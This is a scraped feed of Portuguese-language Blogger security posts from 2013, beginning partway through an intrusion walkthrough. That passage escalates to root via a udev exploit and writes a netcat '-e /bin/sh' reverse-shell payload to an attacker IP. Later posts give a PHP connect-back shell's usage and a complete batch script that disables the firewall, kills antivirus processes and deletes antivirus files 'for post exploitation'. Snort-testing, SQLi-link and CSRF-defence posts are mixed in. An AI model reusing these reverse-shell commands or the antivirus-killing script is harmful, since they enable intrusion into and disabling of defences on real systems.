<span style="font-family: Arial; font-size: 10.0pt;">Antes de continuarmos quero esclarecer
algo para que ninguém fique confuso. Até aqui ele já conseguiu invadir a
máquina, o problema é que essa conexão foi estabelecida sem privilégios, ou
seja, ele não é root. O que ele esta tentando agora é explorar uma falha do
udev (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1185) para virar
root no sistema, para isso ele carregou um exploit na máquina alvo e vai
executar esse exploit. Lendo o exploit (8572.c) podemos ver o que é preciso
para ele funcionar, veja o que esta escrito entre as linhas 27 e 31:<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Courier New"; font-size: 10.0pt;"> </span><span lang="EN-US" style="font-family: "Courier New"; font-size: 10.0pt; mso-ansi-language: EN-US;">* Pass the PID of the udevd netlink socket
(listed in /proc/net/netlink, <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Courier New"; font-size: 10.0pt; mso-ansi-language: EN-US;"> * usually is the udevd PID minus 1) as
argv[1].<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Courier New"; font-size: 10.0pt; mso-ansi-language: EN-US;"> *<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Courier New"; font-size: 10.0pt; mso-ansi-language: EN-US;"> * The exploit will execute /tmp/run as root so
throw whatever payload you <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Courier New"; font-size: 10.0pt; mso-ansi-language: EN-US;"> </span><span style="font-family: "Courier New"; font-size: 10.0pt;">*
want in there.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Essas informações são fundamentais
para que o exploit funcione. Podemos ver que o exploit vai executar com
permissões de root o arquivo que será criado (/tmp/run), e recomenda que nosso
payload seja colocado nesse arquivo. <o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Ele executou o nc no backtrack para
escutar na porta 1234, o payload que ele carrega vai se conectar nessa porta. A
seguência de comandos abaixo serviu para ele criar o payload (/tmp/run):<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">echo
"#!/bin/sh" > /tmp/run<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">echo
"/bin/netcat -e /bin/sh 192.168.2.41 1234" >> /tmp/run<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">chmod +x /tmp/run<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">obs: esses comandos foram executados
na janela onde esta rodando a conexão reversa, esse arquivo tem que ser criado
na máquina alvo.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Na linha 27 do código fonte do
exploit diz que é preciso encontrar o PID do udevd e executar o exploit
diminuindo esse valor por 1. Primeiro ele executou "ps aux | grep
udev" e viu que o PID é 2717, em seguida ele executou o exploit (./udev
2716). Pronto temos nossa conexão reversa com permissão de root.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10pt;"><b>Passo 5</b></span><br />
<span style="font-family: Arial; font-size: 10pt;"><b><br /></b></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Ele executou um comando em python (python
-c 'import pty; pty.spawn("/bin/bash")'</span><span style="font-family: Arial; font-size: 10pt; text-align: justify;">), para que possamos entender esse
comando vamos primeiro falar de PTY.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Um pty é um pseudoterminal - simula
ao programa que esta anexado um terminal, em vez de se comunicar diretamente
com um terminal ele transfere a entrada e saída para outro programa. Por
exemplo, quando você executa um "ls" dentro de uma conexão ssh, o
comando "ls" envia sua saída para um pseudo terminal, do outro lado,
que esta acessando o servidor SSHD. O PTY nos permite conectar numa shell de
forma remota onde podemos executar comandos. Normalmente se usa esse comando em
python quando é gerado um erro ao tentar executar alguns comandos, como su, ssh
ou login. Esse comando gera um shell anexando uma PTY. Ele não precisaria disso
porquê qualquer comando já seria executado como root, mas poderia ser um
problema se fosse preciso executar outros comandos.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Pronto.
Espero que tenham gostado.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
</div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-55545283948468774572013-01-25T14:36:00.001-03:002013-01-25T14:36:12.998-03:00Fix Autopwn Metasploit BT5<iframe allowfullscreen="" frameborder="0" height="344" src="http://www.youtube.com/embed/nyPYAAZqUFU" width="459"></iframe>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-2835783708725324622013-01-18T16:52:00.002-03:002013-01-18T16:53:25.675-03:00Grayscale PHP Connect Back Shell Utility 1.1<table border="0" cellpadding="0" cellspacing="0" style="background-color: white; font-family: sans-serif;"><tbody>
<tr><td><a href="http://www.blogger.com/blogger.g?blogID=9011889618799415918" name="#Grayscale PHP Connect Back Shell Utility 1.1"></a><a class="ToolsTitleLink" href="http://www.grayscale-research.org/new/code/GS-PHPConnectBack.tar" style="color: #110000; font-size: 18px; font-weight: bold; text-decoration: initial;">Grayscale PHP Connect Back Shell Utility 1.1</a></td></tr>
<tr></tr>
</tbody></table>
<table border="0" cellpadding="0" cellspacing="0" class="ToolsTitleTable" style="background-color: white; border-top-style: dashed; border-top-width: 1px; font-family: sans-serif;"><tbody>
<tr><td class="ToolsSource" style="color: #550000; font-size: 16px; font-weight: bold;">Source:</td><td class="ToolsSourceContent" style="font-size: 14px; font-weight: bold; padding-left: 10px;">Grayscale Research</td></tr>
<tr></tr>
</tbody></table>
<br /><div>
<div>
This tool is useful specificially for penetration tests which include LAMP/WAMP servers. Upload this script to a remote host with file upload, locate script, and set up an accessable listening socket.</div>
<div>
<br /></div>
<div>
Set Up Listener (any port can be used):</div>
<div>
nc -l -p 777</div>
<div>
<br /></div>
<div>
Then invoke the page as follows:</div>
<div>
http://website/php_connectback.php?host=connectbackipaddress&port=777</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
This will use the php engine to connect back to the host and allow for a shell to be spawned remotely using just PHP.</div>
<div>
<br /></div>
<div>
http://www.grayscale-research.org/new/code/GS-PHPConnectBack.tar</div>
</div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-82967311662369965512013-01-17T18:32:00.001-03:002013-01-17T18:32:00.068-03:00SQL Injection Cheat Sheet <br />
MySQL - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet<br />
Oracle - http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet<br />
MSSQL - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet<br />
Postgres - http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet<br />
Ingres - http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet<br />
DB2 - http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet<br />
Informix - http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet<br />
MS Access - http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html<br />
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-74747710852063785082013-01-17T18:13:00.000-03:002013-01-17T18:13:23.175-03:00SQLi - ERROS COMUNS EM BANCO DE DADOS<br />
Pequeno trecho da minha monografia que estarei defendendo em fevereiro 2013.<br />
<br />
11. ERROS COMUNS EM BANCO DE DADOS<br />
<br />
<div style="text-align: justify;">
É muito importante saber identificar e estar familiarizado com os vários tipos de erros emitidos pelo banco de dados quando se realiza testes de SQL injection. Como visto antes, temos um cenário de três camadas, onde o servidor WEB fica no meio entre o usuário (browser) e o banco de dados. Dependendo de como foi desenvolvido a aplicação web, os erros emitidos pelo banco de dados podem ser manipulados pela aplicação da seguinte forma:</div>
<br />
- O erro em SQL é mostrado na tela do browser para o usuário<br />
<br />
- O erro em SQL é escondido na própria página web por motivos de depuração<br />
<br />
- O usuário é redirecionado para outra página<br />
<br />
- Os erros em HTTP podem ser obtidos: 500 e 302<br />
<br />
- O aplicativo lida com o erro corretamente e simplesmente não mostra resultados, talvez exibição de uma página de erro genérica.<br />
<br />
<div style="text-align: justify;">
Para identificar possíveis brechas de SQL injection é preciso identificar os erros retornados pela aplicação web.</div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-12783545433632211022013-01-16T13:53:00.000-03:002013-01-16T13:53:03.876-03:00DNS Cache PoisoningLembrando do tempo quando brincava com o Bind 9.3.2, obrigado Metasploit bailiwicked_domain.rb.<br />
<br />
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="270" src="http://www.youtube.com/embed/UtEPfAgp2Xg" width="480"></iframe></div>
<br />
<br />
<br />
<br />Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-17702643453312766532013-01-15T22:54:00.000-03:002013-01-15T22:54:07.542-03:00Anatomy of a mobile attack<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUcar5uInJTwENt2ONZoODvgk77o6ezeDWpS3ZkR18DxJL9JlhsSd6PifQLjuzk_mvgB77I39uEtqMBkcHlAIvLplvcFEda2ZwcpxTqmpUENoyDK45Lt0fdr7LtzxE_3Q0j1NCa2hxE2q/s1600/AntomyOfmobileAttack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvUcar5uInJTwENt2ONZoODvgk77o6ezeDWpS3ZkR18DxJL9JlhsSd6PifQLjuzk_mvgB77I39uEtqMBkcHlAIvLplvcFEda2ZwcpxTqmpUENoyDK45Lt0fdr7LtzxE_3Q0j1NCa2hxE2q/s320/AntomyOfmobileAttack.jpg" width="320" /></a></div>
<br />Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-41510245969276008912013-01-15T13:34:00.000-03:002013-01-23T15:22:54.627-03:00Testando Regras do Snort<div style="text-align: justify;">
Estou começando a brincar com o snort novamente e algo importante depois de configurar e customizar o snort é testar suas regras. Na verdade minha brincadeira começa ai. A ideia é propor um cenário onde você possa testar as regras do snort, com isso você poderá ter as seguintes informações: quanto tempo que suas regras demoram para serem atualizadas depois que saiu algum exploit novo e poderá verificar se uma regra nova esta funcionando.</div>
<br />
<div style="text-align: justify;">
Neste post não vou entrar em detalhes como o LAB foi montado, apenas irei expor minha ideia para que se possa realizar os testes necessários. Para o nosso teste podemos usar o Metasploit ou outra ferramenta do tipo, podendo até mesmo usar um exploit especifico se for o caso. Veja abaixo como ficou o nosso cenário de teste:</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz6wesA8S5RgeOolcxsca-ixbdzlLrSrZ0hF-yQOmYIfNVYvKDozHhB0JMXyfQ-qMA35bJxLKwbavaUnqqFkxl-r-paLI_6pOWsTD1uOSvj0rk6MtOK4sYzxBJ2OW9V9m78QVqgOwEnKjk/s1600/teste-snort.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz6wesA8S5RgeOolcxsca-ixbdzlLrSrZ0hF-yQOmYIfNVYvKDozHhB0JMXyfQ-qMA35bJxLKwbavaUnqqFkxl-r-paLI_6pOWsTD1uOSvj0rk6MtOK4sYzxBJ2OW9V9m78QVqgOwEnKjk/s320/teste-snort.bmp" width="320" /></a></div>
<br />
<div style="text-align: justify;">
Na máquina A temos um windows (xp, vista, 7, etc), rodando alguma aplicação vulnerável onde já tenha o exploit no Metasploit. Sempre aparece falhas de segurança no Java e no Internet Explorer, então escolha uma das duas aplicações ou utilize a ferramenta autopwn do projeto metasploit, veja o vídeo abaixo:</div>
<br />
<div style="text-align: center;">
<iframe allowfullscreen="" center="center" frameborder="0" height="344" src="http://www.youtube.com/embed/VXmE0QycUd8" text-align:="text-align:" width="459"></iframe><br /></div>
<br />
<div style="text-align: center;">
<br /></div>
Na máquina B temos um Linux, onde iremos instalar o metasploit e o tcpdump. O snort pode ser opcional porque poderemos testar em outra máquina onde já tenha o snort instalado e configurado.<br />
<br />
Segue os procedimentos necessários:<br />
<br />
1 - rode o tcpdump para salvar em arquivo todo o tráfego gerado<br />
2 - Execute metasploit autopwn (conforme no vídeo acima)<br />
<br />
Na máquina rodando o snort rode o seguinte comando:<br />
<b id="internal-source-marker_0.38688829238526523" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">#snort -c /usr/local/etc/nsm/snort.conf -r </span><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">/tmp/</span></b><b id="internal-source-marker_0.38688829238526523" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">autopwn-trafego.pcap</span></b><b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> -l /tmp/ -A full -b</span></b><br />
<br />
<b id="internal-source-marker_0.38688829238526523" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">autopwn-trafego.pcap = é o arquivo salvo com o comando tcpdump.</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Agora rode o grep para ler o arquivo alert que foi gerado dentro do diretório /tmp:</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<b id="internal-source-marker_0.38688829238526523" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">#grep '\[\*\*\]' /tmp/alert</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Agora é só analisar o que foi detectado pelo snort.</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Outra maneira de gerar esse tráfego para ser salvo pelo tcpdump seria utilizando a ferramenta hping. Pegue o valor do campo "</span></b><b id="internal-source-marker_0.10472611035220325" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">content" de alguma regra do snort e passe esse valor para o hping. Digamos que tem uma regra com "</span></b><b id="internal-source-marker_0.10472611035220325" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">content:"AAAAAAAAAAAAAAAAAAAAAAAAA";", agora criamos um arquivo com o valor </span></b><b id="internal-source-marker_0.10472611035220325" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">"AAAAAAAAAAAAAAAAAAAAAAAAA" e chamamos esse arquivo com o comando:</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<b id="internal-source-marker_0.10472611035220325" style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">#hping3 -P -i eth1 -s 3434 -p 81 -d 26 -E ./payload.txt 192.168.1.37</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b><b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Agora sim vamos começar a brincar de verdade, check os links abaixo:</span></b><br />
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b>
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;">https://community.rapid7.com/community/metasploit/blog/2011/07/08/testing-snort-ids-with-metasploit-vsploit-modules</span></span></span><br />
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;"><span style="font-weight: normal;"><br /></span></span></span></span>
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;">https://community.rapid7.com/community/metasploit/blog/2011/06/13/emulating-suspicious-dns-traffic-with-metasploit-framework</span></span></span><br />
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;"><br /></span></span></span>
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;">http://vimeo.com/24571294</span></span></span><br />
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;"><br /></span></span></span>
<span style="font-family: 'Courier New'; vertical-align: baseline;"><span style="font-size: x-small;"><span style="white-space: pre-wrap;">http://vimeo.com/24572815</span></span><br /></span>
<b style="font-weight: normal;"><span style="font-family: 'Courier New'; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Bom Proveito.</span></b>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-8055676530586975952013-01-11T18:07:00.002-03:002013-01-11T18:07:36.079-03:00Técnicas de Post ExploitationSegue uma lista de alguns sites que mostram o que fazer logo depois de invadir um sistema, conhecido também como Post Exploitation.<br />
<br />
Post Exploitation Using Meterpreter<br />http://www.exploit-db.com/wp-content/themes/exploit/docs/18229.pdf<br /><br />Post-Exploitation phase<br />http://www.pentest-standard.org/index.php/Post_Exploitation<br /><br />Post Exploitation Command Lists<br />http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html<br /><br />MSF Post Exploitation<br />http://www.offensive-security.com/metasploit-unleashed/MSF_Post_Exploitation<br /><br />Post-Exploitation in Windows: From Local Admin To Domain Admin<br />http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin<br />Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-12462694604999232612013-01-11T17:39:00.001-03:002013-01-15T13:57:08.364-03:00Kill AntivirusSegue abaixo um exemplo de um batch script que tem a finalidade de parar qualquer antivirus, ótimo para post exploitation.<br />
<br />
Abra o notepad cole o conteudo abaixo e salve como killav.bat.<br />
<br />
@ echo off<br />
rem --<br />
rem Permanently Kill Anti-Virus<br />
net stop “Security Center”<br />
netsh firewall set opmode mode=disable<br />
tskill /A av*<br />
tskill /A fire*<br />
tskill /A anti*<br />
cls<br />
tskill /A spy*<br />
tskill /A bullguard<br />
tskill /A PersFw<br />
tskill /A KAV*<br />
tskill /A ZONEALARM<br />
tskill /A SAFEWEB<br />
cls<br />
tskill /A OUTPOST<br />
tskill /A nv*<br />
tskill /A nav*<br />
tskill /A F-*<br />
tskill /A ESAFE<br />
tskill /A cle<br />
cls<br />
tskill /A BLACKICE<br />
tskill /A def*<br />
tskill /A kav<br />
tskill /A kav*<br />
tskill /A avg*<br />
tskill /A ash*<br />
cls<br />
tskill /A aswupdsv<br />
tskill /A ewid*<br />
tskill /A guard*<br />
tskill /A guar*<br />
tskill /A gcasDt*<br />
tskill /A msmp*<br />
cls<br />
tskill /A mcafe*<br />
tskill /A mghtml<br />
tskill /A msiexec<br />
tskill /A outpost<br />
tskill /A isafe<br />
tskill /A zap*<br />
cls<br />
tskill /A zauinst<br />
tskill /A upd*<br />
tskill /A zlclien*<br />
tskill /A minilog<br />
tskill /A cc*<br />
tskill /A norton*<br />
cls<br />
tskill /A norton au*<br />
tskill /A ccc*<br />
tskill /A npfmn*<br />
tskill /A loge*<br />
tskill /A nisum*<br />
tskill /A issvc<br />
tskill /A tmp*<br />
cls<br />
tskill /A tmn*<br />
tskill /A pcc*<br />
tskill /A cpd*<br />
tskill /A pop*<br />
tskill /A pav*<br />
tskill /A padmin<br />
cls<br />
tskill /A panda*<br />
tskill /A avsch*<br />
tskill /A sche*<br />
tskill /A syman*<br />
tskill /A virus*<br />
tskill /A realm*<br />
cls<br />
tskill /A sweep*<br />
tskill /A scan*<br />
tskill /A ad-*<br />
tskill /A safe*<br />
tskill /A avas*<br />
tskill /A norm*<br />
cls<br />
tskill /A offg*<br />
del /Q /F C:\Program Files\alwils~1\avast4\*.*<br />
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe<br />
del /Q /F C:\Program Files\kasper~1\*.exe<br />
cls<br />
del /Q /F C:\Program Files\trojan~1\*.exe<br />
del /Q /F C:\Program Files\f-prot95\*.dll<br />
del /Q /F C:\Program Files\tbav\*.dat<br />
cls<br />
del /Q /F C:\Program Files\avpersonal\*.vdf<br />
del /Q /F C:\Program Files\Norton~1\*.cnt<br />
del /Q /F C:\Program Files\<span class="IL_AD" id="IL_AD4">Mcafee</span>\*.*<br />
cls<br />
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*<br />
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*<br />
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*<br />
del /Q /F C:\Program Files\Norton~1\*.*<br />
cls<br />
del /Q /F C:\Program Files\avgamsr\*.exe<br />
del /Q /F C:\Program Files\avgamsvr\*.exe<br />
del /Q /F C:\Program Files\avgemc\*.exe<br />
cls<br />
del /Q /F C:\Program Files\avgcc\*.exe<br />
del /Q /F C:\Program Files\avgupsvc\*.exe<br />
del /Q /F C:\Program Files\grisoft<br />
del /Q /F C:\Program Files\nood32krn\*.exe<br />
del /Q /F C:\Program Files\nood32\*.exe<br />
cls<br />
del /Q /F C:\Program Files\nod32<br />
del /Q /F C:\Program Files\nood32<br />
del /Q /F C:\Program Files\kav\*.exe<br />
del /Q /F C:\Program Files\kavmm\*.exe<br />
del /Q /F C:\Program Files\kaspersky\*.*<br />
cls<br />
del /Q /F C:\Program Files\ewidoctrl\*.exe<br />
del /Q /F C:\Program Files\guard\*.exe<br />
del /Q /F C:\Program Files\ewido\*.exe<br />
cls<br />
del /Q /F C:\Program Files\pavprsrv\*.exe<br />
del /Q /F C:\Program Files\pavprot\*.exe<br />
del /Q /F C:\Program Files\avengine\*.exe<br />
cls<br />
del /Q /F C:\Program Files\apvxdwin\*.exe<br />
del /Q /F C:\Program Files\webproxy\*.exe<br />
del /Q /F C:\Program Files\panda software\*.*<br />
rem --<br />
<br />
Uma outra solução seria a utilização do script killav.rb que faz parte do Projeto Metasploit. O problema é que este script já esta sendo detectado pela maioria dos antivírus, então foi pensado numa outra solução chamado getcountermeasure.rb.
Para maiores informações sobre getcountermeasure.rb veja os links abaixo:<br />
<br />
http://wiki.mccune.org.uk/index.php/Metasploit<br />
<br />
https://github.com/pwnieexpress/metasploit-framework/blob/master/scripts/meterpreter/getcountermeasure.rb
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-71237234707494198422013-01-11T15:52:00.001-03:002013-01-11T15:52:28.608-03:00pfSense 2.0.1 CSRF RCE remote root shell######################################################################<br />
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access<br />
# Date: 04/01/2013<br />
# Author: Yann CAM @ Synetis<br />
# Vendor or Software Link: www.pfsense.org<br />
# Version: 2.0.1<br />
# Category: XSS & CSRF Remote root Access<br />
# Google dork:<br />
# Tested on: FreeBSD<br />
######################################################################<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="344" src="http://www.youtube.com/embed/qnmalMrrUF4" width="459"></iframe><br />
<br />
source: http://www.exploit-db.com/exploits/23901/<br />
<br />
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-77554630975002959592013-01-11T15:38:00.001-03:002013-01-11T15:38:22.354-03:00Securing your application against Cross-Site Request Forgery<div class="lead">
Securing your application against Cross-Site Request Forgery has never been
easier. Why rewrite every form on your website when a program can do it for
you? Simply drop this at the top of every PHP file:
</div>
<pre><code> </code></pre>
<pre><code>require_once '/path/to/csrf-magic.php';
</code></pre>
<div class="lead">
<br /></div>
<div class="lead">
...and let the magic take care of the rest.
<a href="http://csrf.htmlpurifier.org/releases/csrf-magic-1.0.3.tar.gz" shape="rect">Download it now</a>!
Or try out <a href="http://csrf.htmlpurifier.org/dev/test.php" shape="rect">the demo</a>.</div>
<div class="lead">
<br /></div>
<div class="lead">
source: http://csrf.htmlpurifier.org/ </div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-10099403191132674382013-01-10T23:36:00.004-03:002013-01-10T23:39:18.385-03:00Removing administrator rights or do not log in with Administrators user from laptop<div style="font-family: Arial,sans-serif; font-size: 14px; line-height: 22px; margin: 0px 0px 20px; padding: 0px; text-align: justify;">
Laptops
present a significant challenge for security focused companies. Laptop
computers can be a common mechanism for viruses, spyware, and other
security threats to enter an otherwise well-protected corporate network.
Additionally, laptop users have sensitive data stored on their
computer, making their protection increasingly important.</div>
<div style="font-family: Arial,sans-serif; font-size: 14px; line-height: 22px; margin: 0px 0px 20px; padding: 0px; text-align: justify;">
Removing
administrator rights or do not log in with Administrators user from laptop increases protection from
viruses and spyware. Without administrator rights most malware cannot
install. Furthermore, a review of all vulnerabilities documented in last
year's Microsoft Security Bulletins shows that removing admin rights
can mitigate the effects of 92 percent of critical Microsoft
vulnerabilities.</div>
<div style="font-family: Arial,sans-serif; font-size: 14px; line-height: 22px; margin: 0px 0px 20px; padding: 0px; text-align: justify;">
However,
travelling laptop users need administrator rights to perform many
functions on their computers such as connecting to a hotel printer, or
installing authorized software and ActiveX controls.<br />
<br />
source: email sent by BeyondTrust.</div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-63810047631492773522013-01-10T13:02:00.001-03:002013-01-10T13:02:39.007-03:00Computer network monitoring, security and audit tools<iframe allowfullscreen="" frameborder="0" height="270" src="http://www.youtube.com/embed/HlgyJ1z0mT8" width="480"></iframe><br />
<br />
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-66421458905549500132013-01-09T10:26:00.001-03:002013-01-09T10:26:07.988-03:00Penetration Testing in the Real World<iframe src="http://player.vimeo.com/video/11213607" width="500" height="375" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe> <p><a href="http://vimeo.com/11213607">Penetration Testing in the Real World</a> from <a href="http://vimeo.com/offsec">Offensive Security</a> on <a href="http://vimeo.com">Vimeo</a>.</p>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-3456360793597888262013-01-09T10:24:00.000-03:002013-01-09T10:24:17.734-03:00Yahoo DOM XSS 0day - Not fixed yet<embed allowfullscreen="true" allowscriptaccess="always" flashvars="&fbit.height=456&fbit.pluginmode=FLASH&fbit.visible=true&fbit.width=640&fbit.x=0&fbit.y=0&file=http%3A%2F%2Fwww.offensive-security.com%2Fvideos%2Fyahoo-xss-0day.mp4&plugins=viral-2h%2Cfbit-1h%2Chttp%3A%2F%2Flp.longtailvideo.com%2F5%2Fsharing%2Fsharing.swf&sharing.height=456&sharing.pluginmode=HYBRID&sharing.visible=true&sharing.width=640&sharing.x=0&sharing.y=0&viral.allowmenu=true&viral.bgcolor=0x333333&viral.fgcolor=0xffffff&viral.functions=embed&viral.matchplayercolors=true&viral.oncomplete=true&viral.onpause=true&viral.pluginmode=FLASH" height="480" src="http://cdn3.offensive-security.com/wp-content/uploads/jw-player-plugin-for-wordpress/player/player.swf" width="640"></embed>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0